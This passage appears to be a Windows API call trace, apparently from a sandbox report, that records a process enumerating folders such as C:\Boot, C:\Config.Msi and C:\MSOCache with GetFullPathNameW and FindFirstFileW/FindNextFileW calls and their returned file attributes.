returned 1 [0039.485] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0039.485] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\", lpFilePart=0x0) returned 0xe [0039.485] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.485] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.485] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.485] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.485] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.486] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\.", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0039.486] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.486] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.486] CoTaskMemFree (pv=0x4fe370) [0039.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.486] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x2aedfc, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0039.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0039.486] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0039.486] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0039.486] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.486] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.486] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0039.487] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af284) returned 1 [0039.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af290) returned 1 [0039.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0039.487] GetFullPathNameW (in: lpFileName="C:\\Config.Msi", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi", lpFilePart=0x0) returned 0xd [0039.487] GetFullPathNameW (in: lpFileName="C:\\Config.Msi\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\Config.Msi\\", lpFilePart=0x0) returned 0xe [0039.487] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.487] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.487] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0039.487] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af284) returned 1 [0039.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af290) returned 1 [0039.487] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings\\.", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings", lpFilePart=0x0) returned 0x19 [0039.487] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.487] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.487] CoTaskMemFree (pv=0x4fe370) [0039.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.488] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings", nBufferLength=0x105, lpBuffer=0x2aedfc, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings", lpFilePart=0x0) returned 0x19 [0039.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0039.488] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings", lpFilePart=0x0) returned 0x19 [0039.488] GetFullPathNameW (in: lpFileName="C:\\Documents and Settings\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\Documents and Settings\\", lpFilePart=0x0) returned 0x1a [0039.488] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0039.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af288) returned 1 [0039.489] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\.", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0039.489] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.489] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.489] CoTaskMemFree (pv=0x4fe370) [0039.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.490] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x2aedfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0039.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0039.490] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0039.490] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0039.490] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.490] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.490] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0039.491] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0039.491] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af284) returned 1 [0039.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af290) returned 1 [0039.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af2c4) returned 1 [0039.491] GetFullPathNameW (in: lpFileName="C:\\MSOCache", nBufferLength=0x105, lpBuffer=0x2aedcc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache", lpFilePart=0x0) returned 0xb [0039.491] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\", nBufferLength=0x105, lpBuffer=0x2aeda0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\", lpFilePart=0x0) returned 0xc [0039.491] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x2aefec | out: lpFindFileData=0x2aefec*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.491] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.491] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0039.491] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.492] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af284) returned 1 [0039.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af290) returned 1 [0039.492] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0039.492] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.492] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.492] CoTaskMemFree (pv=0x4fe370) [0039.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.492] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0039.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.492] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users", lpFilePart=0x0) returned 0x15 [0039.492] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\", lpFilePart=0x0) returned 0x16 [0039.492] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.548] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.565] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0039.565] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0039.566] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0039.566] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0039.566] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0039.566] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0039.566] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0039.566] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0039.567] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0039.567] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0039.567] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0039.567] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: 